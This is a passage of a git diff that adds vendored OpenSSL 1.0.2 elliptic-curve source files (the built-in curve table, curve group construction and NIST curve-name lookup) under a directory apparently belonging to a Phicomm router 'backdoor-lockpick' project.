+        0x9D, 0xB1, 0x75, 0x8D, 0x39, 0xC0, 0x31, 0x3D, 0x82, 0xBA, 0x51, 0x73,
+        0x5C, 0xDB, 0x3E, 0xA4, 0x99, 0xAA, 0x77, 0xA7, 0xD6, 0x94, 0x3A, 0x64,
+        0xF7, 0xA3, 0xF2, 0x5F, 0xE2, 0x6F, 0x06, 0xB5, 0x1B, 0xAA, 0x26, 0x96,
+        0xFA, 0x90, 0x35, 0xDA,
+        /* y */
+        0x5B, 0x53, 0x4B, 0xD5, 0x95, 0xF5, 0xAF, 0x0F, 0xA2, 0xC8, 0x92, 0x37,
+        0x6C, 0x84, 0xAC, 0xE1, 0xBB, 0x4E, 0x30, 0x19, 0xB7, 0x16, 0x34, 0xC0,
+        0x11, 0x31, 0x15, 0x9C, 0xAE, 0x03, 0xCE, 0xE9, 0xD9, 0x93, 0x21, 0x84,
+        0xBE, 0xEF, 0x21, 0x6B, 0xD7, 0x1D, 0xF2, 0xDA, 0xDF, 0x86, 0xA6, 0x27,
+        0x30, 0x6E, 0xCF, 0xF9, 0x6D, 0xBB, 0x8B, 0xAC, 0xE1, 0x98, 0xB6, 0x1E,
+        0x00, 0xF8, 0xB3, 0x32,
+        /* order */
+        0xAA, 0xDD, 0x9D, 0xB8, 0xDB, 0xE9, 0xC4, 0x8B, 0x3F, 0xD4, 0xE6, 0xAE,
+        0x33, 0xC9, 0xFC, 0x07, 0xCB, 0x30, 0x8D, 0xB3, 0xB3, 0xC9, 0xD2, 0x0E,
+        0xD6, 0x63, 0x9C, 0xCA, 0x70, 0x33, 0x08, 0x70, 0x55, 0x3E, 0x5C, 0x41,
+        0x4C, 0xA9, 0x26, 0x19, 0x41, 0x86, 0x61, 0x19, 0x7F, 0xAC, 0x10, 0x47,
+        0x1D, 0xB1, 0xD3, 0x81, 0x08, 0x5D, 0xDA, 0xDD, 0xB5, 0x87, 0x96, 0x82,
+        0x9C, 0xA9, 0x00, 0x69
+    }
+};
+
+typedef struct _ec_list_element_st {
+    int nid;
+    const EC_CURVE_DATA *data;
+    const EC_METHOD *(*meth) (void);
+    const char *comment;
+} ec_list_element;
+
+static const ec_list_element curve_list[] = {
+    /* prime field curves */
+    /* secg curves */
+    {NID_secp112r1, &_EC_SECG_PRIME_112R1.h, 0,
+     "SECG/WTLS curve over a 112 bit prime field"},
+    {NID_secp112r2, &_EC_SECG_PRIME_112R2.h, 0,
+     "SECG curve over a 112 bit prime field"},
+    {NID_secp128r1, &_EC_SECG_PRIME_128R1.h, 0,
+     "SECG curve over a 128 bit prime field"},
+    {NID_secp128r2, &_EC_SECG_PRIME_128R2.h, 0,
+     "SECG curve over a 128 bit prime field"},
+    {NID_secp160k1, &_EC_SECG_PRIME_160K1.h, 0,
+     "SECG curve over a 160 bit prime field"},
+    {NID_secp160r1, &_EC_SECG_PRIME_160R1.h, 0,
+     "SECG curve over a 160 bit prime field"},
+    {NID_secp160r2, &_EC_SECG_PRIME_160R2.h, 0,
+     "SECG/WTLS curve over a 160 bit prime field"},
+    /* SECG secp192r1 is the same as X9.62 prime192v1 and hence omitted */
+    {NID_secp192k1, &_EC_SECG_PRIME_192K1.h, 0,
+     "SECG curve over a 192 bit prime field"},
+    {NID_secp224k1, &_EC_SECG_PRIME_224K1.h, 0,
+     "SECG curve over a 224 bit prime field"},
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+    {NID_secp224r1, &_EC_NIST_PRIME_224.h, EC_GFp_nistp224_method,
+     "NIST/SECG curve over a 224 bit prime field"},
+#else
+    {NID_secp224r1, &_EC_NIST_PRIME_224.h, 0,
+     "NIST/SECG curve over a 224 bit prime field"},
+#endif
+    {NID_secp256k1, &_EC_SECG_PRIME_256K1.h, 0,
+     "SECG curve over a 256 bit prime field"},
+    /* SECG secp256r1 is the same as X9.62 prime256v1 and hence omitted */
+    {NID_secp384r1, &_EC_NIST_PRIME_384.h, 0,
+     "NIST/SECG curve over a 384 bit prime field"},
+#ifndef OPENSSL_NO_EC_NISTP_64_GCC_128
+    {NID_secp521r1, &_EC_NIST_PRIME_521.h, EC_GFp_nistp521_method,
+     "NIST/SECG curve over a 521 bit prime field"},
+#else
+    {NID_secp521r1, &_EC_NIST_PRIME_521.h, 0,
+     "NIST/SECG curve over a 521 bit prime field"},
+#endif
+    /* X9.62 curves */
+    {NID_X9_62_prime192v1, &_EC_NIST_PRIME_192.h, 0,
+     "NIST/X9.62/SECG curve over a 192 bit prime field"},
+    {NID_X9_62_prime192v2, &_EC_X9_62_PRIME_192V2.h, 0,
+     "X9.62 curve over a 192 bit prime field"},
+    {NID_X9_62_prime192v3, &_EC_X9_62_PRIME_192V3.h, 0,
+     "X9.62 curve over a 192 bit prime field"},
+    {NID_X9_62_prime239v1, &_EC_X9_62_PRIME_239V1.h, 0,
+     "X9.62 curve over a 239 bit prime field"},
+    {NID_X9_62_prime239v2, &_EC_X9_62_PRIME_239V2.h, 0,
+     "X9.62 curve over a 239 bit prime field"},
+    {NID_X9_62_prime239v3, &_EC_X9_62_PRIME_239V3.h, 0,
+     "X9.62 curve over a 239 bit prime field"},
+    {NID_X9_62_prime256v1, &_EC_X9_62_PRIME_256V1.h,
+#if defined(ECP_NISTZ256_ASM)
+     EC_GFp_nistz256_method,
+#elif !defined(OPENSSL_NO_EC_NISTP_64_GCC_128)
+     EC_GFp_nistp256_method,
+#else
+     0,
+#endif
+     "X9.62/SECG curve over a 256 bit prime field"},
+#ifndef OPENSSL_NO_EC2M
+    /* characteristic two field curves */
+    /* NIST/SECG curves */
+    {NID_sect113r1, &_EC_SECG_CHAR2_113R1.h, 0,
+     "SECG curve over a 113 bit binary field"},
+    {NID_sect113r2, &_EC_SECG_CHAR2_113R2.h, 0,
+     "SECG curve over a 113 bit binary field"},
+    {NID_sect131r1, &_EC_SECG_CHAR2_131R1.h, 0,
+     "SECG/WTLS curve over a 131 bit binary field"},
+    {NID_sect131r2, &_EC_SECG_CHAR2_131R2.h, 0,
+     "SECG curve over a 131 bit binary field"},
+    {NID_sect163k1, &_EC_NIST_CHAR2_163K.h, 0,
+     "NIST/SECG/WTLS curve over a 163 bit binary field"},
+    {NID_sect163r1, &_EC_SECG_CHAR2_163R1.h, 0,
+     "SECG curve over a 163 bit binary field"},
+    {NID_sect163r2, &_EC_NIST_CHAR2_163B.h, 0,
+     "NIST/SECG curve over a 163 bit binary field"},
+    {NID_sect193r1, &_EC_SECG_CHAR2_193R1.h, 0,
+     "SECG curve over a 193 bit binary field"},
+    {NID_sect193r2, &_EC_SECG_CHAR2_193R2.h, 0,
+     "SECG curve over a 193 bit binary field"},
+    {NID_sect233k1, &_EC_NIST_CHAR2_233K.h, 0,
+     "NIST/SECG/WTLS curve over a 233 bit binary field"},
+    {NID_sect233r1, &_EC_NIST_CHAR2_233B.h, 0,
+     "NIST/SECG/WTLS curve over a 233 bit binary field"},
+    {NID_sect239k1, &_EC_SECG_CHAR2_239K1.h, 0,
+     "SECG curve over a 239 bit binary field"},
+    {NID_sect283k1, &_EC_NIST_CHAR2_283K.h, 0,
+     "NIST/SECG curve over a 283 bit binary field"},
+    {NID_sect283r1, &_EC_NIST_CHAR2_283B.h, 0,
+     "NIST/SECG curve over a 283 bit binary field"},
+    {NID_sect409k1, &_EC_NIST_CHAR2_409K.h, 0,
+     "NIST/SECG curve over a 409 bit binary field"},
+    {NID_sect409r1, &_EC_NIST_CHAR2_409B.h, 0,
+     "NIST/SECG curve over a 409 bit binary field"},
+    {NID_sect571k1, &_EC_NIST_CHAR2_571K.h, 0,
+     "NIST/SECG curve over a 571 bit binary field"},
+    {NID_sect571r1, &_EC_NIST_CHAR2_571B.h, 0,
+     "NIST/SECG curve over a 571 bit binary field"},
+    /* X9.62 curves */
+    {NID_X9_62_c2pnb163v1, &_EC_X9_62_CHAR2_163V1.h, 0,
+     "X9.62 curve over a 163 bit binary field"},
+    {NID_X9_62_c2pnb163v2, &_EC_X9_62_CHAR2_163V2.h, 0,
+     "X9.62 curve over a 163 bit binary field"},
+    {NID_X9_62_c2pnb163v3, &_EC_X9_62_CHAR2_163V3.h, 0,
+     "X9.62 curve over a 163 bit binary field"},
+    {NID_X9_62_c2pnb176v1, &_EC_X9_62_CHAR2_176V1.h, 0,
+     "X9.62 curve over a 176 bit binary field"},
+    {NID_X9_62_c2tnb191v1, &_EC_X9_62_CHAR2_191V1.h, 0,
+     "X9.62 curve over a 191 bit binary field"},
+    {NID_X9_62_c2tnb191v2, &_EC_X9_62_CHAR2_191V2.h, 0,
+     "X9.62 curve over a 191 bit binary field"},
+    {NID_X9_62_c2tnb191v3, &_EC_X9_62_CHAR2_191V3.h, 0,
+     "X9.62 curve over a 191 bit binary field"},
+    {NID_X9_62_c2pnb208w1, &_EC_X9_62_CHAR2_208W1.h, 0,
+     "X9.62 curve over a 208 bit binary field"},
+    {NID_X9_62_c2tnb239v1, &_EC_X9_62_CHAR2_239V1.h, 0,
+     "X9.62 curve over a 239 bit binary field"},
+    {NID_X9_62_c2tnb239v2, &_EC_X9_62_CHAR2_239V2.h, 0,
+     "X9.62 curve over a 239 bit binary field"},
+    {NID_X9_62_c2tnb239v3, &_EC_X9_62_CHAR2_239V3.h, 0,
+     "X9.62 curve over a 239 bit binary field"},
+    {NID_X9_62_c2pnb272w1, &_EC_X9_62_CHAR2_272W1.h, 0,
+     "X9.62 curve over a 272 bit binary field"},
+    {NID_X9_62_c2pnb304w1, &_EC_X9_62_CHAR2_304W1.h, 0,
+     "X9.62 curve over a 304 bit binary field"},
+    {NID_X9_62_c2tnb359v1, &_EC_X9_62_CHAR2_359V1.h, 0,
+     "X9.62 curve over a 359 bit binary field"},
+    {NID_X9_62_c2pnb368w1, &_EC_X9_62_CHAR2_368W1.h, 0,
+     "X9.62 curve over a 368 bit binary field"},
+    {NID_X9_62_c2tnb431r1, &_EC_X9_62_CHAR2_431R1.h, 0,
+     "X9.62 curve over a 431 bit binary field"},
+    /*
+     * the WAP/WTLS curves [unlike SECG, spec has its own OIDs for curves
+     * from X9.62]
+     */
+    {NID_wap_wsg_idm_ecid_wtls1, &_EC_WTLS_1.h, 0,
+     "WTLS curve over a 113 bit binary field"},
+    {NID_wap_wsg_idm_ecid_wtls3, &_EC_NIST_CHAR2_163K.h, 0,
+     "NIST/SECG/WTLS curve over a 163 bit binary field"},
+    {NID_wap_wsg_idm_ecid_wtls4, &_EC_SECG_CHAR2_113R1.h, 0,
+     "SECG curve over a 113 bit binary field"},
+    {NID_wap_wsg_idm_ecid_wtls5, &_EC_X9_62_CHAR2_163V1.h, 0,
+     "X9.62 curve over a 163 bit binary field"},
+#endif
+    {NID_wap_wsg_idm_ecid_wtls6, &_EC_SECG_PRIME_112R1.h, 0,
+     "SECG/WTLS curve over a 112 bit prime field"},
+    {NID_wap_wsg_idm_ecid_wtls7, &_EC_SECG_PRIME_160R2.h, 0,
+     "SECG/WTLS curve over a 160 bit prime field"},
+    {NID_wap_wsg_idm_ecid_wtls8, &_EC_WTLS_8.h, 0,
+     "WTLS curve over a 112 bit prime field"},
+    {NID_wap_wsg_idm_ecid_wtls9, &_EC_WTLS_9.h, 0,
+     "WTLS curve over a 160 bit prime field"},
+#ifndef OPENSSL_NO_EC2M
+    {NID_wap_wsg_idm_ecid_wtls10, &_EC_NIST_CHAR2_233K.h, 0,
+     "NIST/SECG/WTLS curve over a 233 bit binary field"},
+    {NID_wap_wsg_idm_ecid_wtls11, &_EC_NIST_CHAR2_233B.h, 0,
+     "NIST/SECG/WTLS curve over a 233 bit binary field"},
+#endif
+    {NID_wap_wsg_idm_ecid_wtls12, &_EC_WTLS_12.h, 0,
+     "WTLS curvs over a 224 bit prime field"},
+#ifndef OPENSSL_NO_EC2M
+    /* IPSec curves */
+    {NID_ipsec3, &_EC_IPSEC_155_ID3.h, 0,
+     "\n\tIPSec/IKE/Oakley curve #3 over a 155 bit binary field.\n"
+     "\tNot suitable for ECDSA.\n\tQuestionable extension field!"},
+    {NID_ipsec4, &_EC_IPSEC_185_ID4.h, 0,
+     "\n\tIPSec/IKE/Oakley curve #4 over a 185 bit binary field.\n"
+     "\tNot suitable for ECDSA.\n\tQuestionable extension field!"},
+#endif
+    /* brainpool curves */
+    {NID_brainpoolP160r1, &_EC_brainpoolP160r1.h, 0,
+     "RFC 5639 curve over a 160 bit prime field"},
+    {NID_brainpoolP160t1, &_EC_brainpoolP160t1.h, 0,
+     "RFC 5639 curve over a 160 bit prime field"},
+    {NID_brainpoolP192r1, &_EC_brainpoolP192r1.h, 0,
+     "RFC 5639 curve over a 192 bit prime field"},
+    {NID_brainpoolP192t1, &_EC_brainpoolP192t1.h, 0,
+     "RFC 5639 curve over a 192 bit prime field"},
+    {NID_brainpoolP224r1, &_EC_brainpoolP224r1.h, 0,
+     "RFC 5639 curve over a 224 bit prime field"},
+    {NID_brainpoolP224t1, &_EC_brainpoolP224t1.h, 0,
+     "RFC 5639 curve over a 224 bit prime field"},
+    {NID_brainpoolP256r1, &_EC_brainpoolP256r1.h, 0,
+     "RFC 5639 curve over a 256 bit prime field"},
+    {NID_brainpoolP256t1, &_EC_brainpoolP256t1.h, 0,
+     "RFC 5639 curve over a 256 bit prime field"},
+    {NID_brainpoolP320r1, &_EC_brainpoolP320r1.h, 0,
+     "RFC 5639 curve over a 320 bit prime field"},
+    {NID_brainpoolP320t1, &_EC_brainpoolP320t1.h, 0,
+     "RFC 5639 curve over a 320 bit prime field"},
+    {NID_brainpoolP384r1, &_EC_brainpoolP384r1.h, 0,
+     "RFC 5639 curve over a 384 bit prime field"},
+    {NID_brainpoolP384t1, &_EC_brainpoolP384t1.h, 0,
+     "RFC 5639 curve over a 384 bit prime field"},
+    {NID_brainpoolP512r1, &_EC_brainpoolP512r1.h, 0,
+     "RFC 5639 curve over a 512 bit prime field"},
+    {NID_brainpoolP512t1, &_EC_brainpoolP512t1.h, 0,
+     "RFC 5639 curve over a 512 bit prime field"},
+};
+
+#define curve_list_length (sizeof(curve_list)/sizeof(ec_list_element))
+
+static EC_GROUP *ec_group_new_from_data(const ec_list_element curve)
+{
+    EC_GROUP *group = NULL;
+    EC_POINT *P = NULL;
+    BN_CTX *ctx = NULL;
+    BIGNUM *p = NULL, *a = NULL, *b = NULL, *x = NULL, *y = NULL, *order =
+        NULL;
+    int ok = 0;
+    int seed_len, param_len;
+    const EC_METHOD *meth;
+    const EC_CURVE_DATA *data;
+    const unsigned char *params;
+
+    if ((ctx = BN_CTX_new()) == NULL) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    data = curve.data;
+    seed_len = data->seed_len;
+    param_len = data->param_len;
+    params = (const unsigned char *)(data + 1); /* skip header */
+    params += seed_len;         /* skip seed */
+
+    if (!(p = BN_bin2bn(params + 0 * param_len, param_len, NULL))
+        || !(a = BN_bin2bn(params + 1 * param_len, param_len, NULL))
+        || !(b = BN_bin2bn(params + 2 * param_len, param_len, NULL))) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_BN_LIB);
+        goto err;
+    }
+
+    if (curve.meth != 0) {
+        meth = curve.meth();
+        if (((group = EC_GROUP_new(meth)) == NULL) ||
+            (!(group->meth->group_set_curve(group, p, a, b, ctx)))) {
+            ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+            goto err;
+        }
+    } else if (data->field_type == NID_X9_62_prime_field) {
+        if ((group = EC_GROUP_new_curve_GFp(p, a, b, ctx)) == NULL) {
+            ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+#ifndef OPENSSL_NO_EC2M
+    else {                      /* field_type ==
+                                 * NID_X9_62_characteristic_two_field */
+
+        if ((group = EC_GROUP_new_curve_GF2m(p, a, b, ctx)) == NULL) {
+            ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+#endif
+
+    if ((P = EC_POINT_new(group)) == NULL) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+        goto err;
+    }
+
+    if (!(x = BN_bin2bn(params + 3 * param_len, param_len, NULL))
+        || !(y = BN_bin2bn(params + 4 * param_len, param_len, NULL))) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_BN_LIB);
+        goto err;
+    }
+    if (!EC_POINT_set_affine_coordinates_GFp(group, P, x, y, ctx)) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (!(order = BN_bin2bn(params + 5 * param_len, param_len, NULL))
+        || !BN_set_word(x, (BN_ULONG)data->cofactor)) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_BN_LIB);
+        goto err;
+    }
+    if (!EC_GROUP_set_generator(group, P, order, x)) {
+        ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+        goto err;
+    }
+    if (seed_len) {
+        if (!EC_GROUP_set_seed(group, params - seed_len, seed_len)) {
+            ECerr(EC_F_EC_GROUP_NEW_FROM_DATA, ERR_R_EC_LIB);
+            goto err;
+        }
+    }
+    ok = 1;
+ err:
+    if (!ok) {
+        EC_GROUP_free(group);
+        group = NULL;
+    }
+    if (P)
+        EC_POINT_free(P);
+    if (ctx)
+        BN_CTX_free(ctx);
+    if (p)
+        BN_free(p);
+    if (a)
+        BN_free(a);
+    if (b)
+        BN_free(b);
+    if (order)
+        BN_free(order);
+    if (x)
+        BN_free(x);
+    if (y)
+        BN_free(y);
+    return group;
+}
+
+EC_GROUP *EC_GROUP_new_by_curve_name(int nid)
+{
+    size_t i;
+    EC_GROUP *ret = NULL;
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_ec_group_new_by_curve_name(nid);
+#endif
+    if (nid <= 0)
+        return NULL;
+
+    for (i = 0; i < curve_list_length; i++)
+        if (curve_list[i].nid == nid) {
+            ret = ec_group_new_from_data(curve_list[i]);
+            break;
+        }
+
+    if (ret == NULL) {
+        ECerr(EC_F_EC_GROUP_NEW_BY_CURVE_NAME, EC_R_UNKNOWN_GROUP);
+        return NULL;
+    }
+
+    EC_GROUP_set_curve_name(ret, nid);
+
+    return ret;
+}
+
+size_t EC_get_builtin_curves(EC_builtin_curve *r, size_t nitems)
+{
+    size_t i, min;
+
+    if (r == NULL || nitems == 0)
+        return curve_list_length;
+
+    min = nitems < curve_list_length ? nitems : curve_list_length;
+
+    for (i = 0; i < min; i++) {
+        r[i].nid = curve_list[i].nid;
+        r[i].comment = curve_list[i].comment;
+    }
+
+    return curve_list_length;
+}
+
+/* Functions to translate between common NIST curve names and NIDs */
+
+typedef struct {
+    const char *name;           /* NIST Name of curve */
+    int nid;                    /* Curve NID */
+} EC_NIST_NAME;
+
+static EC_NIST_NAME nist_curves[] = {
+    {"B-163", NID_sect163r2},
+    {"B-233", NID_sect233r1},
+    {"B-283", NID_sect283r1},
+    {"B-409", NID_sect409r1},
+    {"B-571", NID_sect571r1},
+    {"K-163", NID_sect163k1},
+    {"K-233", NID_sect233k1},
+    {"K-283", NID_sect283k1},
+    {"K-409", NID_sect409k1},
+    {"K-571", NID_sect571k1},
+    {"P-192", NID_X9_62_prime192v1},
+    {"P-224", NID_secp224r1},
+    {"P-256", NID_X9_62_prime256v1},
+    {"P-384", NID_secp384r1},
+    {"P-521", NID_secp521r1}
+};
+
+const char *EC_curve_nid2nist(int nid)
+{
+    size_t i;
+    for (i = 0; i < sizeof(nist_curves) / sizeof(EC_NIST_NAME); i++) {
+        if (nist_curves[i].nid == nid)
+            return nist_curves[i].name;
+    }
+    return NULL;
+}
+
+int EC_curve_nist2nid(const char *name)
+{
+    size_t i;
+    for (i = 0; i < sizeof(nist_curves) / sizeof(EC_NIST_NAME); i++) {
+        if (!strcmp(nist_curves[i].name, name))
+            return nist_curves[i].nid;
+    }
+    return NID_undef;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_cvt.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_cvt.c
new file mode 100644
index 0000000..73cc123
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_cvt.c
@@ -0,0 +1,180 @@
+/* crypto/ec/ec_cvt.c */
+/*
+ * Originally written by Bodo Moeller for the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * The elliptic curve binary polynomial software is originally written by
+ * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories.
+ *
+ */
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+#include <openssl/err.h>
+#include "ec_lcl.h"
+
+EC_GROUP *EC_GROUP_new_curve_GFp(const BIGNUM *p, const BIGNUM *a,
+                                 const BIGNUM *b, BN_CTX *ctx)
+{
+    const EC_METHOD *meth;
+    EC_GROUP *ret;
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_ec_group_new_curve_gfp(p, a, b, ctx);
+#endif
+#if defined(OPENSSL_BN_ASM_MONT)
+    /*
+     * This might appear controversial, but the fact is that generic
+     * prime method was observed to deliver better performance even
+     * for NIST primes on a range of platforms, e.g.: 60%-15%
+     * improvement on IA-64, ~25% on ARM, 30%-90% on P4, 20%-25%
+     * in 32-bit build and 35%--12% in 64-bit build on Core2...
+     * Coefficients are relative to optimized bn_nist.c for most
+     * intensive ECDSA verify and ECDH operations for 192- and 521-
+     * bit keys respectively. Choice of these boundary values is
+     * arguable, because the dependency of improvement coefficient
+     * from key length is not a "monotone" curve. For example while
+     * 571-bit result is 23% on ARM, 384-bit one is -1%. But it's
+     * generally faster, sometimes "respectfully" faster, sometimes
+     * "tolerably" slower... What effectively happens is that loop
+     * with bn_mul_add_words is put against bn_mul_mont, and the
+     * latter "wins" on short vectors. Correct solution should be
+     * implementing dedicated NxN multiplication subroutines for
+     * small N. But till it materializes, let's stick to generic
+     * prime method...
+     *                                              <appro>
+     */
+    meth = EC_GFp_mont_method();
+#else
+    meth = EC_GFp_nist_method();
+#endif
+
+    ret = EC_GROUP_new(meth);
+    if (ret == NULL)
+        return NULL;
+
+    if (!EC_GROUP_set_curve_GFp(ret, p, a, b, ctx)) {
+        unsigned long err;
+
+        err = ERR_peek_last_error();
+
+        if (!(ERR_GET_LIB(err) == ERR_LIB_EC &&
+              ((ERR_GET_REASON(err) == EC_R_NOT_A_NIST_PRIME) ||
+               (ERR_GET_REASON(err) == EC_R_NOT_A_SUPPORTED_NIST_PRIME)))) {
+            /* real error */
+
+            EC_GROUP_clear_free(ret);
+            return NULL;
+        }
+
+        /*
+         * not an actual error, we just cannot use EC_GFp_nist_method
+         */
+
+        ERR_clear_error();
+
+        EC_GROUP_clear_free(ret);
+        meth = EC_GFp_mont_method();
+
+        ret = EC_GROUP_new(meth);
+        if (ret == NULL)
+            return NULL;
+
+        if (!EC_GROUP_set_curve_GFp(ret, p, a, b, ctx)) {
+            EC_GROUP_clear_free(ret);
+            return NULL;
+        }
+    }
+
+    return ret;
+}
+
+#ifndef OPENSSL_NO_EC2M
+EC_GROUP *EC_GROUP_new_curve_GF2m(const BIGNUM *p, const BIGNUM *a,
+                                  const BIGNUM *b, BN_CTX *ctx)
+{
+    const EC_METHOD *meth;
+    EC_GROUP *ret;
+
+# ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_ec_group_new_curve_gf2m(p, a, b, ctx);
+# endif
+    meth = EC_GF2m_simple_method();
+
+    ret = EC_GROUP_new(meth);
+    if (ret == NULL)
+        return NULL;
+
+    if (!EC_GROUP_set_curve_GF2m(ret, p, a, b, ctx)) {
+        EC_GROUP_clear_free(ret);
+        return NULL;
+    }
+
+    return ret;
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_err.c
new file mode 100644
index 0000000..13b32c7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ec_err.c
@@ -0,0 +1,331 @@
+/* crypto/ec/ec_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
